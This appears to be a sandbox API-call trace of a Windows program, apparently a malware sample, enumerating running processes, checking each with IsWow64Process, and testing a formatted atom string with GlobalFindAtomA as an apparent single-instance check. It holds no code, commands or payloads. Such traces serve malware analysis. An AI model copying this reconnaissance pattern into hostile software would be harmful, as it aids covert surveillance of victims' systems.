	[0128.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="volunteer.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="volunteer.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.665] CloseHandle (hObject=0x2dc) returned 1
	[0128.665] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.665] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.665] CloseHandle (hObject=0x2dc) returned 1
	[0128.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=29, lpMultiByteStr=0x39b97a8, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 29
	[0128.666] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.666] CloseHandle (hObject=0x2dc) returned 1
	[0128.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bracket-natural-chancellor.exe", cchWideChar=30, lpMultiByteStr=0x39b9af0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bracket-natural-chancellor.exe", lpUsedDefaultChar=0x0) returned 30
	[0128.666] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.666] CloseHandle (hObject=0x2dc) returned 1
	[0128.666] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="safari.exe", cchWideChar=10, lpMultiByteStr=0x39b5a48, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="safari.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.667] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.668] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0128.668] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.668] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] wsprintfA (in: param_1=0x39938f8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.669] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.670] GetLastError () returned 0x5
	[0128.671] GetLastError () returned 0x5
	[0128.671] GetLastError () returned 0x5
	[0128.671] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.671] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0128.671] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0128.671] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0128.671] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0128.671] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0128.672] CloseHandle (hObject=0x2dc) returned 1
	[0128.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0128.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sppsvc.exe", cchWideChar=10, lpMultiByteStr=0x39b59e8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.672] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.672] CloseHandle (hObject=0x2dc) returned 1
	[0128.672] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="cmd.exe", cchWideChar=7, lpMultiByteStr=0x69d5d8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="cmd.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.672] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.672] CloseHandle (hObject=0x2dc) returned 1
	[0128.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x39b5970, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0128.673] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.673] CloseHandle (hObject=0x2dc) returned 1
	[0128.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="conhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.673] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.673] CloseHandle (hObject=0x2dc) returned 1
	[0128.673] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PING.EXE", cchWideChar=8, lpMultiByteStr=0x39b5a78, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PING.EXE", lpUsedDefaultChar=0x0) returned 8
	[0128.674] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.674] CloseHandle (hObject=0x2dc) returned 1
	[0128.674] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="backgroundTaskHost.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="backgroundTaskHost.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.706] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smss.exe", cchWideChar=8, lpMultiByteStr=0x39b5c10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 8
	[0128.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wininit.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="csrss.exe", cchWideChar=9, lpMultiByteStr=0x39b59e8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winlogon.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="services.exe", cchWideChar=12, lpMultiByteStr=0x39b5b80, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.707] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="lsass.exe", cchWideChar=9, lpMultiByteStr=0x39b5b08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 9
	[0128.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b80, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dwm.exe", cchWideChar=7, lpMultiByteStr=0x69d578, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.708] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5a78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.709] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spoolsv.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spoolsv.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.710] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.710] CloseHandle (hObject=0x2dc) returned 1
	[0128.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="sihost.exe", cchWideChar=10, lpMultiByteStr=0x39b5970, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sihost.exe", lpUsedDefaultChar=0x0) returned 10
	[0128.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5c10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.710] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OfficeClickToRun.exe", cchWideChar=20, lpMultiByteStr=0x399d128, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OfficeClickToRun.exe", lpUsedDefaultChar=0x0) returned 20
	[0128.711] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.711] CloseHandle (hObject=0x2dc) returned 1
	[0128.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="RuntimeBroker.exe", cchWideChar=17, lpMultiByteStr=0x399d128, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RuntimeBroker.exe", lpUsedDefaultChar=0x0) returned 17
	[0128.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.711] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.711] CloseHandle (hObject=0x2dc) returned 1
	[0128.711] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskhostw.exe", cchWideChar=13, lpMultiByteStr=0x39b5970, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.712] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.712] CloseHandle (hObject=0x2dc) returned 1
	[0128.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="explorer.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="explorer.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.712] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.712] CloseHandle (hObject=0x2dc) returned 1
	[0128.712] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5c10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.712] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.712] CloseHandle (hObject=0x2dc) returned 1
	[0128.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ShellExperienceHost.exe", cchWideChar=23, lpMultiByteStr=0x399d128, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ShellExperienceHost.exe", lpUsedDefaultChar=0x0) returned 23
	[0128.713] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.713] CloseHandle (hObject=0x2dc) returned 1
	[0128.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SearchUI.exe", cchWideChar=12, lpMultiByteStr=0x39b5b38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SearchUI.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.713] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.713] CloseHandle (hObject=0x2dc) returned 1
	[0128.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=11, lpMultiByteStr=0x39b5b38, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.714] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.714] CloseHandle (hObject=0x2dc) returned 1
	[0128.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SkypeHost.exe", cchWideChar=13, lpMultiByteStr=0x39b5b08, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SkypeHost.exe", lpUsedDefaultChar=0x0) returned 13
	[0128.714] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.714] CloseHandle (hObject=0x2dc) returned 1
	[0128.714] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x39b5970, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.715] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.715] CloseHandle (hObject=0x2dc) returned 1
	[0128.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="develop-patent.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="develop-patent.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.715] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.715] CloseHandle (hObject=0x2dc) returned 1
	[0128.715] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="its.exe", cchWideChar=7, lpMultiByteStr=0x69d5f8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="its.exe", lpUsedDefaultChar=0x0) returned 7
	[0128.716] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.716] CloseHandle (hObject=0x2dc) returned 1
	[0128.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gently budapest.exe", cchWideChar=19, lpMultiByteStr=0x399d128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gently budapest.exe", lpUsedDefaultChar=0x0) returned 19
	[0128.716] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.716] CloseHandle (hObject=0x2dc) returned 1
	[0128.716] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thoroughlypriestprefix.exe", cchWideChar=26, lpMultiByteStr=0x39b98c0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thoroughlypriestprefix.exe", lpUsedDefaultChar=0x0) returned 26
	[0128.716] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.716] CloseHandle (hObject=0x2dc) returned 1
	[0128.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="inserted_field.exe", cchWideChar=18, lpMultiByteStr=0x399d128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="inserted_field.exe", lpUsedDefaultChar=0x0) returned 18
	[0128.717] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.717] CloseHandle (hObject=0x2dc) returned 1
	[0128.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="semi bay.exe", cchWideChar=12, lpMultiByteStr=0x39b5b08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="semi bay.exe", lpUsedDefaultChar=0x0) returned 12
	[0128.717] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.717] CloseHandle (hObject=0x2dc) returned 1
	[0128.717] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outdoor.exe", cchWideChar=11, lpMultiByteStr=0x39b5b08, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outdoor.exe", lpUsedDefaultChar=0x0) returned 11
	[0128.718] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.718] CloseHandle (hObject=0x2dc) returned 1
	[0128.718] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="wool-parish-horses.exe", cchWideChar=22, lpMultiByteStr=0x399d128, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wool-parish-horses.exe", lpUsedDefaultChar=0x0) returned 22
	[0128.718] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0128.718] CloseHandle (hObject=0x2dc) returned 1
